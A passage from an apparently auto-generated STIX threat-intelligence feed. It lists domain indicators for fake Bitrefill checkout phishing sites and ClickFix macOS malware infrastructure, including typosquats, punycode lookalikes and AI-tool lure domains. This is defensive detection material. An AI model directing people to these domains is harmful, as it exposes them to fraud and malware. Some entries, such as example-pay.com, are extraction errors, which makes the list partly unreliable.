bitruflli.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: retill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pa","pattern":"[domain-name:value = 'bitruflli.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9459ad8d-d2b2-46c8-b151-52548ec11dec","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: rgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]co","pattern":"[domain-name:value = 'butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--45dbb385-9d79-4adf-88ba-7042eb44c39f","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: example-pay.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y’s main domain, as in pay.example.com . An address such as example-pay.com is a completely separate domain that anyone could register.","pattern":"[domain-name:value = 'example-pay.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0d726c3-fd11-48db-a0e1-795d23439f4f","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pay-bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefl","pattern":"[domain-name:value = 'pay-bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca8fb120-6406-4e0c-93ee-76678302581c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pay-bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: gifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]co","pattern":"[domain-name:value = 'pay-bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63337ca5-ea34-48f5-b34b-8028b52a184e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pay-bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: l[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]co","pattern":"[domain-name:value = 'pay-bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59c332db-9faa-48f2-a2f0-b260914ffba3","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pay-bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.","pattern":"[domain-name:value = 'pay-bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7594a868-9e92-4b53-87b7-8323b73f91b1","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pay-butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2","pattern":"[domain-name:value = 'pay-butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a372e44-0031-424b-8ff8-d6b0ab8a8e68","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitrefll-71a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-71a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3613e903-6360-4f84-964b-1b972ead55cb","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitrefll-h2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn-","pattern":"[domain-name:value = 'xn--bitrefll-h2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10e827bf-e730-4fe3-9fc9-42809cddc62e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitrefll-pay-kfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: itigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-pay-kfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--941373ed-1a3d-472d-81ac-229fc4dcd6e6","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitrefll-pay-xfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitrei","pattern":"[domain-name:value = 'xn--bitrefll-pay-xfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--39bcad94-0102-4302-a5d0-3d7e3d85af52","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitrefll-q2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: .]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--b","pattern":"[domain-name:value = 'xn--bitrefll-q2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d16d9f6c-0850-4f32-adad-222889511782","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitreill-cz9c.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pa","pattern":"[domain-name:value = 'xn--bitreill-cz9c.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29fd9735-4a11-46cf-8169-2a7a73801530","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--bitreill-pay-yq4f.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop th","pattern":"[domain-name:value = 'xn--bitreill-pay-yq4f.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23707d55-5324-4e87-bbfb-273ef90b2abf","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--btrefill-l2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can d","pattern":"[domain-name:value = 'xn--btrefill-l2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--795d3502-103c-4273-adb0-6425b46ecf55","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xn--pay-bitrefll-fgb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can do any harm. Malwarebytes Br","pattern":"[domain-name:value = 'xn--pay-bitrefll-fgb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--144109c9-e9d1-4c4f-94c9-a1be5b8f2d50","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: aforvm.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com;","pattern":"[domain-name:value = 'aforvm.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5342a074-0116-4c93-af61-0bcd7ba3e32b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: aidevmaster.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumb","pattern":"[domain-name:value = 'aidevmaster.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95b69632-9675-47d9-9a60-926fdcecc00c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: alfredaps.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; co","pattern":"[domain-name:value = 'alfredaps.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d1b067d-060a-4227-85f6-b8e30f92f842","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: applediag.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub","pattern":"[domain-name:value = 'applediag.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e607c92-6de8-4f45-8e2d-9ee92c684135","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: arkypc.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; gro","pattern":"[domain-name:value = 'arkypc.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05f0d64d-c737-4dc0-9273-448bd937164c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: basequill9.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekm","pattern":"[domain-name:value = 'basequill9.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a885381-44d3-4d09-9faa-378ada085561","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: beaocnagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: aesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Dom","pattern":"[domain-name:value = 'beaocnagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7884b4d0-8fdd-4e5a-a53e-d370ea7c3a6c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bright-links.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]g","pattern":"[domain-name:value = 'bright-links.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35d53880-c740-47d2-911d-e80d63c5d215","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: broadwalkindia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.]com Teardown and deli","pattern":"[domain-name:value = 'broadwalkindia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ed94751-415f-4cbc-80b2-b68d3d40711c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: camaligsalvatrefoils.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com","pattern":"[domain-name:value = 'camaligsalvatrefoils.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b1d9a4a-eba6-4201-bc5b-1f20f3fb70fd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: canvas-35.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery dom","pattern":"[domain-name:value = 'canvas-35.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6923b49-b554-44f4-bde4-2ecd52885d67","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cehamilton.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.","pattern":"[domain-name:value = 'cehamilton.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78132d3d-929b-46b2-ae03-8e285e564be0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chatgpt-safepage.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsof","pattern":"[domain-name:value = 'chatgpt-safepage.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9bd58d0-6248-4ea9-bd9c-dbc643bb7943","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cladesktop.gitlab.io","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ight-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]c","pattern":"[domain-name:value = 'cladesktop.gitlab.io']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--84d866c7-fbc8-4fbc-9781-d642fb47bf19","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: claude-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-li","pattern":"[domain-name:value = 'claude-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6bc6dda3-da20-4466-bb30-f080c4c1c0cc","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: claud-tips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; mu","pattern":"[domain-name:value = 'claud-tips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ddd5e02d-b35b-46e3-8ed1-76aac21d1baa","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: r-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae113c57-1b34-4b60-bdc5-4e3bb63fb312","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clean-disk-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain","pattern":"[domain-name:value = 'clean-disk-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 